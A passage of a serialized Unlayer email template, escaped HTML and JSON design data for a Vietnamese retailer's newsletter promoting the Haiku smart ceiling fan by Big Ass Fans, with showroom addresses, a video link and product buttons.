300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px; padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      <a href=\\\"https:\\/\\/youtu.be\\/AjYMiqVCkrw?lis\\\" target=\\\"_blank\\\">\\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677123215015-video_youtube_AjYMiqVCkrw.jpg\\\" alt=\\\"Video\\\" title=\\\"Video\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\" class=\\\"fullwidth\\\" \\/>\\r\\n      <\\/a>\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296625467-quet_BR_code_2023.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:187px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"187\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:187px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/linkedin.com\\/\\\" title=\\\"LinkedIn\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/linkedin.png\\\" alt=\\\"LinkedIn\\\" title=\\\"LinkedIn\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/twitter.com\\/\\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/instagram.com\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/youtube.com\\/\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #333333; line-height: 180%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><strong><span style=\\\"line-height: 21.6px;\\\">GI\\u1ea2I PH\\u00c1P L\\u00c0M M\\u00c1T TO\\u00c0N DI\\u1ec6N KH\\u00d4NG GIAN NH\\u00c0 \\u1ede - V\\u0102N PH\\u00d2NG - NH\\u00c0 X\\u01af\\u1edeNG C\\u00d4NG NGHI\\u1ec6P<\\/span><\\/strong><\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><strong>SR THU DUC: <\\/strong>184 Tran Luu, An Phu, Thu Duc, HCM<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><strong>SR QU\\u1eacN 7: <\\/strong>812 Happy Valley, Nguyen Van Linh, Tan Phong, District 7, HCM<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\">WIT.\\u00a0 All rights reserved. <\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\">Tax: 0315778682<\\/span><br \\/><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><a rel=\\\"noopener\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\" target=\\\"_blank\\\"><span style=\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\">Manage Preferences<\\/span> <\\/a>| <a rel=\\\"noopener\\\" href=\\\"https:\\/\\/haiku.hogiaphat.vn\\\" target=\\\"_blank\\\"><span style=\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\">View in browser<\\/span>\\u00a0<\\/a><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":14,\\\"u_column\\\":18,\\\"u_content_text\\\":14,\\\"u_content_image\\\":9,\\\"u_content_video\\\":1,\\\"u_content_button\\\":8,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":4},\\\"body\\\":{\\\"id\\\":\\\"ZKEsIo9cyJ\\\",\\\"rows\\\":[{\\\"id\\\":\\\"8v6X8_eWie\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"49F_V6CJYl\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Zre8H6uUHc\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 15px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677121551729-logo-baf.gif\\\",\\\"width\\\":473,\\\"height\\\":282,\\\"maxWidth\\\":\\\"28%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"#bfd8d2\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"RKHaA3kNjd\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"sYJ1ipCk6A\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wb89yjmG82\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"80px 10px 15px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":400,\\\"color\\\":\\\"#e67e23\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: \'Playfair Display\', serif; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 44px; line-height: 61.6px;\\\\\\\"><strong>HAIKU<\\/strong><\\/span><\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 20px; line-height: 28px; font-family: Cabin, sans-serif;\\\\\\\"><span style=\\\\\\\"font-family: \'Playfair Display\', serif; line-height: 28px;\\\\\\\"><span style=\\\\\\\"line-height: 28px;\\\\\\\"><strong>The Smart Ceiling Fan of the Future - Big Ass Fans<\\/strong><\\/span><\\/span><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"HAK8YEjON2\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px 30px 80px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-cao-cap-haiku-h\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#c97a14\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">Let\'s Start<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":114,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677121836979-01-h.jpg\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"width\\\":600,\\\"height\\\":430,\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"gP8etI3XjW\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"IifB1_wM-O\\\",\\\"contents\\\":[{\\\"id\\\":\\\"GiDRLzAilF\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_18\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_14\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"unikoM7yiA\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"h6wnCojqjn\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Ma_hPqaB5Q\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 40px 0px 